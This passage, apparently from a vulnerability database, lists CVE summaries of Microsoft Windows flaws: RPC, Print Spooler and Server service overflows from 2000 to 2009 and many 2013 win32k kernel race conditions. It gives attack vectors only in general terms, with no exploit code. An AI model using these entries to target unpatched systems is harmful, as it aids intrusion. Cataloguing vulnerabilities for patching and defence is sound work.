man-in-the-middle attackers to execute arbitrary code via a malformed response, aka "RPC Memory Corruption Vulnerability." [CVE-2009-2523] The License Logging Server (llssrv.exe) in Microsoft Windows 2000 SP4 allows remote attackers to execute arbitrary code via an RPC message containing a string without a null terminator, which triggers a heap-based buffer overflow in the LlsrLicenseRequestW method, aka "License Logging Server Heap Overflow Vulnerability." [CVE-2009-1544] Double free vulnerability in the Workstation service in Microsoft Windows allows remote authenticated users to gain privileges via a crafted RPC message to a Windows XP SP2 or SP3 or Server 2003 SP2 system, or cause a denial of service via a crafted RPC message to a Vista Gold, SP1, or SP2 or Server 2008 Gold or SP2 system, aka "Workstation Service Memory Corruption Vulnerability." [CVE-2009-0568] The RPC Marshalling Engine (aka NDR) in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 SP2 does not properly maintain its internal state, which allows remote attackers to overwrite arbitrary memory locations via a crafted RPC message that triggers incorrect pointer reading, related to "IDL interfaces containing a non-conformant varying array" and FC_SMVARRAY, FC_LGVARRAY, FC_VARIABLE_REPEAT, and FC_VARIABLE_OFFSET, aka "RPC Marshalling Engine Vulnerability." [CVE-2009-0230] The Windows Print Spooler in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 SP2 allows remote authenticated users to gain privileges via a crafted RPC message that triggers loading of a DLL file from an arbitrary directory, aka "Print Spooler Load Library Vulnerability." [CVE-2009-0228] Stack-based buffer overflow in the EnumeratePrintShares function in Windows Print Spooler Service (win32spl.dll) in Microsoft Windows 2000 SP4 allows remote printer servers to execute arbitrary code via a a crafted ShareName in a response to an RPC request, related to "printing data structures," aka "Buffer Overflow in Print Spooler Vulnerability." [CVE-2009-0079] The RPCSS service in Microsoft Windows XP SP2 and SP3 and Server 2003 SP1 and SP2 does not properly implement isolation among a set of distinct processes that (1) all run under the NetworkService account or (2) all run under the LocalService account, which allows local users to gain privileges by accessing the resources of one of the processes, aka "Windows RPCSS Service Isolation Vulnerability." [CVE-2008-4250] The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary code via a crafted RPC request that triggers the overflow during path canonicalization, as exploited in the wild by Gimmiv.A in October 2008, aka "Server Service Vulnerability." [CVE-2008-4114] srv.sys in the Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows remote attackers to cause a denial of service (system crash) or possibly have unspecified other impact via an SMB WRITE_ANDX packet with an offset that is inconsistent with the packet size, related to "insufficiently validating the buffer size," as demonstrated by a request to the \PIPE\lsarpc named pipe, aka "SMB Validation Denial of Service Vulnerability." [CVE-2008-3479] Heap-based buffer overflow in the Microsoft Message Queuing (MSMQ) service (mqsvc.exe) in Microsoft Windows 2000 SP4 allows remote attackers to read memory contents and execute arbitrary code via a crafted RPC call, related to improper processing of parameters to string APIs, aka "Message Queuing Service Remote Code Execution Vulnerability." [CVE-2007-3039] Stack-based buffer overflow in the Microsoft Message Queuing (MSMQ) service in Microsoft Windows 2000 Server SP4, Windows 2000 Professional SP4, and Windows XP SP2 allows attackers to execute arbitrary code via a long string in an opnum 0x06 RPC call to port 2103. NOTE: this is remotely exploitable on Windows 2000 Server. [CVE-2007-2228] rpcrt4.dll (aka the RPC runtime library) in Microsoft Windows XP SP2, XP Professional x64 Edition, Server 2003 SP1 and SP2, Server 2003 x64 Edition and x64 Edition SP2, and Vista and Vista x64 Edition allows remote attackers to cause a denial of service (RPCSS service stop and system restart) via an RPC request that uses NTLMSSP PACKET authentication with a zero-valued verification trailer signature, which triggers an invalid dereference. NOTE: this also affects Windows 2000 SP4, although the impact is an information leak. [CVE-2007-1748] Stack-based buffer overflow in the RPC interface in the Domain Name System (DNS) Server Service in Microsoft Windows 2000 Server SP 4, Server 2003 SP 1, and Server 2003 SP 2 allows remote attackers to execute arbitrary code via a long zone name containing character constants represented by escape sequences. [CVE-2006-6723] The Workstation service in Microsoft Windows 2000 SP4 and XP SP2 allows remote attackers to cause a denial of service (memory consumption) via a large maxlen value in an NetrWkstaUserEnum RPC request. [CVE-2006-6296] The RpcGetPrinterData function in the Print Spooler (spoolsv.exe) service in Microsoft Windows 2000 SP4 and earlier, and possibly Windows XP SP1 and earlier, allows remote attackers to cause a denial of service (memory consumption) via an RPC request that specifies a large 'offered' value (output buffer size), a variant of CVE-2005-3644. [CVE-2006-4691] Stack-based buffer overflow in the NetpManageIPCConnect function in the Workstation service (wkssvc.dll) in Microsoft Windows 2000 SP4 and XP SP2 allows remote attackers to execute arbitrary code via NetrJoinDomain2 RPC messages with a long hostname. [CVE-2006-3439] Buffer overflow in the Server Service in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 allows remote attackers, including anonymous users, to execute arbitrary code via a crafted RPC message, a different vulnerability than CVE-2006-1314. [CVE-2006-2380] Microsoft Windows 2000 SP4 does not properly validate an RPC server during mutual authentication over SSL, which allows remote attackers to spoof an RPC server, aka the "RPC Mutual Authentication Vulnerability." [CVE-2006-2371] Buffer overflow in the Remote Access Connection Manager service (RASMAN) service in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 and earlier allows remote unauthenticated or authenticated attackers to execute arbitrary code via certain crafted "RPC related requests," that lead to registry corruption and stack corruption, aka the "RASMAN Registry Corruption Vulnerability." [CVE-2006-2370] Buffer overflow in the Routing and Remote Access service (RRAS) in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 and earlier allows remote unauthenticated or authenticated attackers to execute arbitrary code via certain crafted "RPC related requests," aka the "RRAS Memory Corruption Vulnerability." [CVE-2006-0034] Heap-based buffer overflow in the CRpcIoManagerServer::BuildContext function in msdtcprx.dll for Microsoft Distributed Transaction Coordinator (MSDTC) for Windows NT 4.0 and Windows 2000 SP2 and SP3 allows remote attackers to execute arbitrary code via a long fifth argument to the BuildContextW or BuildContext opcode, which triggers a bug in the NdrAllocate function, aka the MSDTC Invalid Memory Access Vulnerability. [CVE-2006-0013] Buffer overflow in the Web Client service (WebClnt.dll) for Microsoft Windows XP SP1 and SP2, and Server 2003 up to SP1, allows remote authenticated users or Guests to execute arbitrary code via crafted RPC requests, a different vulnerability than CVE-2005-1207. [CVE-2005-3644] PNP_GetDeviceList (upnp_getdevicelist) in UPnP for Microsoft Windows 2000 SP4 and earlier, and possibly Windows XP SP1 and earlier, allows remote attackers to cause a denial of service (memory consumption) via a DCE RPC request that specifies a large output buffer size, a variant of CVE-2006-6296, and a different vulnerability than CVE-2005-2120. [CVE-2004-0569] The RPC Runtime Library for Microsoft Windows NT 4.0 allows remote attackers to read active memory or cause a denial of service (system crash) via a malicious message, possibly related to improper length values. [CVE-2004-0124] The DCOM RPC interface for Microsoft Windows NT 4.0, 2000, XP, and Server 2003 allows remote attackers to cause network communications via an "alter context" call that contains additional data, aka the "Object Identity Vulnerability." [CVE-2004-0116] An Activation function in the RPCSS Service involved with DCOM activation for Microsoft Windows 2000, XP, and 2003 allows remote attackers to cause a denial of service (memory consumption) via an activation request with a large length field. [CVE-2003-0807] Buffer overflow in the COM Internet Services and in the RPC over HTTP Proxy components for Microsoft Windows NT Server 4.0, NT 4.0 Terminal Server Edition, 2000, XP, and Server 2003 allows remote attackers to cause a denial of service via a crafted request. [CVE-2003-0352] Buffer overflow in a certain DCOM interface for RPC in Microsoft Windows NT 4.0, 2000, XP, and Server 2003 allows remote attackers to execute arbitrary code via a malformed message, as exploited by the Blaster/MSblast/LovSAN and Nachi/Welchia worms. [CVE-2003-0003] Buffer overflow in the RPC Locator service for Microsoft Windows NT 4.0, Windows NT 4.0 Terminal Server Edition, Windows 2000, and Windows XP allows local users to execute arbitrary code via an RPC call to the service containing certain parameter information. [CVE-2002-1141] An input validation error in the Sun Microsystems RPC library Services for Unix 3.0 Interix SD, as implemented on Microsoft Windows NT4, 2000, and XP, allows remote attackers to cause a denial of service via malformed fragmented RPC client packets, aka "Denial of service by sending an invalid RPC request." [CVE-2002-1140] The Sun Microsystems RPC library Services for Unix 3.0 Interix SD, as implemented on Microsoft Windows NT4, 2000, and XP, allows remote attackers to cause a denial of service (service hang) via malformed packet fragments, aka "Improper parameter size check leading to denial of service." [CVE-2001-0509] Vulnerabilities in RPC servers in (1) Microsoft Exchange Server 2000 and earlier, (2) Microsoft SQL Server 2000 and earlier, (3) Windows NT 4.0, and (4) Windows 2000 allow remote attackers to cause a denial of service via malformed inputs. [CVE-2000-0771] Microsoft Windows 2000 allows local users to cause a denial of service by corrupting the local security policy via malformed RPC traffic, aka the "Local Security Policy Corruption" vulnerability. [CVE-2013-3661] The EPATHOBJ::bFlatten function in win32k.sys in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT does not check whether linked-list traversal is continually accessing the same list member, which allows local users to cause a denial of service (infinite traversal) via vectors that trigger a crafted PATHRECORD chain. [CVE-2013-3660] The EPATHOBJ::pprFlattenRec function in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, and Windows Server 2012 does not properly initialize a pointer for the next object in a certain list, which allows local users to obtain write access to the PATHRECORD chain, and consequently gain privileges, by triggering excessive consumption of paged memory and then making many FlattenPath function calls, aka "Win32k Read AV Vulnerability." [CVE-2013-3174] DirectShow in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, and Windows Server 2012 allows remote attackers to execute arbitrary code via a crafted GIF file, aka "DirectShow Arbitrary Memory Overwrite Vulnerability." [CVE-2013-3173] Buffer overflow in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT allows local users to gain privileges via a crafted application that leverages improper handling of objects in memory, aka "Win32k Buffer Overwrite Vulnerability." [CVE-2013-3172] Buffer overflow in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, and Windows 7 SP1 allows local users to cause a denial of service (system hang) via a crafted application that leverages improper handling of objects in memory, aka "Win32k Buffer Overflow Vulnerability." [CVE-2013-3167] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, and Windows 7 SP1 does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "Win32k Information Disclosure Vulnerability." [CVE-2013-3154] The signature-update functionality in Windows Defender on Microsoft Windows 7 and Windows Server 2008 R2 relies on an incorrect pathname, which allows local users to gain privileges via a Trojan horse application in the %SYSTEMDRIVE% top-level directory, aka "Microsoft Windows 7 Defender Improper Pathname Vulnerability." [CVE-2013-3138] Integer overflow in the TCP/IP kernel-mode driver in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT allows remote attackers to cause a denial of service (system hang) via crafted TCP packets, aka "TCP/IP Integer Overflow Vulnerability." [CVE-2013-3136] The kernel in Microsoft Windows XP SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, Windows 7 SP1, and Windows 8 on 32-bit platforms does not properly handle unspecified page-fault system calls, which allows local users to obtain sensitive information from kernel memory via a crafted application, aka "Kernel Information Disclosure Vulnerability." [CVE-2013-3127] The Microsoft WMV video codec in wmv9vcm.dll, wmvdmod.dll in Windows Media Format Runtime 9 and 9.5, and wmvdecod.dll in Windows Media Format Runtime 11 and Windows Media Player 11 and 12 allows remote attackers to execute arbitrary code via a crafted media file, aka "WMV Video Decoder Remote Code Execution Vulnerability." [CVE-2013-2558] Unspecified vulnerability in Microsoft Windows 8 allows remote attackers to cause a denial of service (reboot) or possibly have unknown other impact via a crafted TrueType Font (TTF) file, as demonstrated by the 120612-69701-01.dmp error report. [CVE-2013-2556] Unspecified vulnerability in Microsoft Windows 7 allows attackers to bypass the ASLR protection mechanism via unknown vectors, as demonstrated against Adobe Flash Player by VUPEN during a Pwn2Own competition at CanSecWest 2013. [CVE-2013-2554] Unspecified vulnerability in Microsoft Windows 7 allows attackers to bypass the ASLR and DEP protection mechanisms via unknown vectors, as demonstrated against Firefox by VUPEN during a Pwn2Own competition at CanSecWest 2013, a different vulnerability than CVE-2013-0787. [CVE-2013-2553] Unspecified vulnerability in the kernel in Microsoft Windows 7 allows local users to gain privileges via unknown vectors, as demonstrated by Nils and Jon of MWR Labs during a Pwn2Own competition at CanSecWest 2013, a different vulnerability than CVE-2013-0912. [CVE-2013-2552] Unspecified vulnerability in Microsoft Internet Explorer 10 on Windows 8 allows remote attackers to bypass the sandbox protection mechanism by leveraging access to a Medium integrity process, as demonstrated by VUPEN during a Pwn2Own competition at CanSecWest 2013. [CVE-2013-1345] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "Win32k Vulnerability." [CVE-2013-1340] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "Win32k Dereference Vulnerability." [CVE-2013-1339] The Print Spooler in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT does not properly manage memory during deletion of printer connections, which allows remote authenticated users to execute arbitrary code via a crafted request, aka "Print Spooler Vulnerability." [CVE-2013-1337] Microsoft .NET Framework 4.5 does not properly create policy requirements for custom Windows Communication Foundation (WCF) endpoint authentication in certain situations involving passwords over HTTPS, which allows remote attackers to bypass authentication by sending queries to an endpoint, aka "Authentication Bypass Vulnerability." [CVE-2013-1334] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "Win32k Window Handle Vulnerability." [CVE-2013-1333] Buffer overflow in win32k.sys in the kernel-mode drivers in Microsoft Windows 7 SP1 allows local users to gain privileges via a crafted application that leverages improper handling of objects in memory, aka "Win32k Buffer Overflow Vulnerability." [CVE-2013-1332] dxgkrnl.sys (aka the DirectX graphics kernel subsystem) in the kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "DirectX Graphics Kernel Subsystem Double Fetch Vulnerability." [CVE-2013-1313] Object Linking and Embedding (OLE) Automation in Microsoft Windows XP SP3 does not properly allocate memory, which allows remote attackers to execute arbitrary code via a crafted RTF document, aka "OLE Automation Remote Code Execution Vulnerability." [CVE-2013-1305] HTTP.sys in Microsoft Windows 8, Windows Server 2012, and Windows RT allows remote attackers to cause a denial of service (infinite loop) via a crafted HTTP header, aka "HTTP.sys Denial of Service Vulnerability." [CVE-2013-1300] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "Win32k Memory Allocation Vulnerability." [CVE-2013-1299] Microsoft Windows Modern Mail allows remote attackers to spoof link targets via a crafted HTML e-mail message. [CVE-2013-1295] The Client/Server Run-time Subsystem (CSRSS) in Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista SP2, and Server 2008 SP2 does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "CSRSS Memory Corruption Vulnerability." [CVE-2013-1294] Race condition in the kernel in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allows local users to gain privileges via a crafted application that leverages improper handling of objects in memory, aka "Kernel Race Condition Vulnerability." [CVE-2013-1293] The NTFS kernel-mode driver in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges or cause a denial of service (NULL pointer dereference and system crash) via a crafted application that leverages improper handling of objects in memory, aka "NTFS NULL Pointer Dereference Vulnerability." [CVE-2013-1292] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allows local users to gain privileges via a crafted application that leverages improper handling of objects in memory, aka "Win32k Race Condition Vulnerability." [CVE-2013-1291] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, Windows 7 Gold and SP1, and Windows 8 allows local users to cause a denial of service (reboot) via a crafted OpenType font, aka "OpenType Font Parsing Vulnerability" or "Win32k Font Parsing Vulnerability." [CVE-2013-1287] The USB kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, and Windows Server 2012 do not properly handle objects in memory, which allows physically proximate attackers to execute arbitrary code by connecting a crafted USB device, aka "Windows USB Descriptor Vulnerability," a different vulnerability than CVE-2013-1285 and CVE-2013-1286. [CVE-2013-1286] The USB kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, and Windows Server 2012 do not properly handle objects in memory, which allows physically proximate attackers to execute arbitrary code by connecting a crafted USB device, aka "Windows USB Descriptor Vulnerability," a different vulnerability than CVE-2013-1285 and CVE-2013-1287. [CVE-2013-1285] The USB kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, and Windows Server 2012 do not properly handle objects in memory, which allows physically proximate attackers to execute arbitrary code by connecting a crafted USB device, aka "Windows USB Descriptor Vulnerability," a different vulnerability than CVE-2013-1286 and CVE-2013-1287. [CVE-2013-1284] Race condition in the kernel in Microsoft Windows 8, Windows Server 2012, and Windows RT allows local users to gain privileges via a crafted application that leverages improper handling of objects in memory, aka "Kernel Race Condition Vulnerability." [CVE-2013-1283] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allows local users to gain privileges via a crafted application that leverages improper handling of objects in memory, aka "Win32k Race Condition Vulnerability." [CVE-2013-1281] The NFS server in Microsoft Windows Server 2008 R2 and R2 SP1 and Server 2012 allows remote attackers to cause a denial of service (NULL pointer dereference and reboot) via an attempted renaming of a file or folder located on a read-only share, aka "NULL Dereference Vulnerability." [CVE-2013-1280] The kernel in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "Windows Kernel Reference Count Vulnerability." [CVE-2013-1279] Race condition in the kernel in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allows local users to gain privileges via a crafted application that leverages incorrect handling of objects in memory, aka "Kernel Race Condition Vulnerability," a different vulnerability than CVE-2013-1278. [CVE-2013-1278] Race condition in the kernel in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allows local users to gain privileges via a crafted application that leverages incorrect handling of objects in memory, aka "Kernel Race Condition Vulnerability," a different vulnerability than CVE-2013-1279. [CVE-2013-1277] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1276] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1275] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1274] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1273] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1272] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1271] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1270] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1269] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1268] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1267] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1266] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1265] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1264] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1263] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1262] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1261] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1260] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1259] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1258] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1257] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1256] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1255] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1254] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1253] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1252] 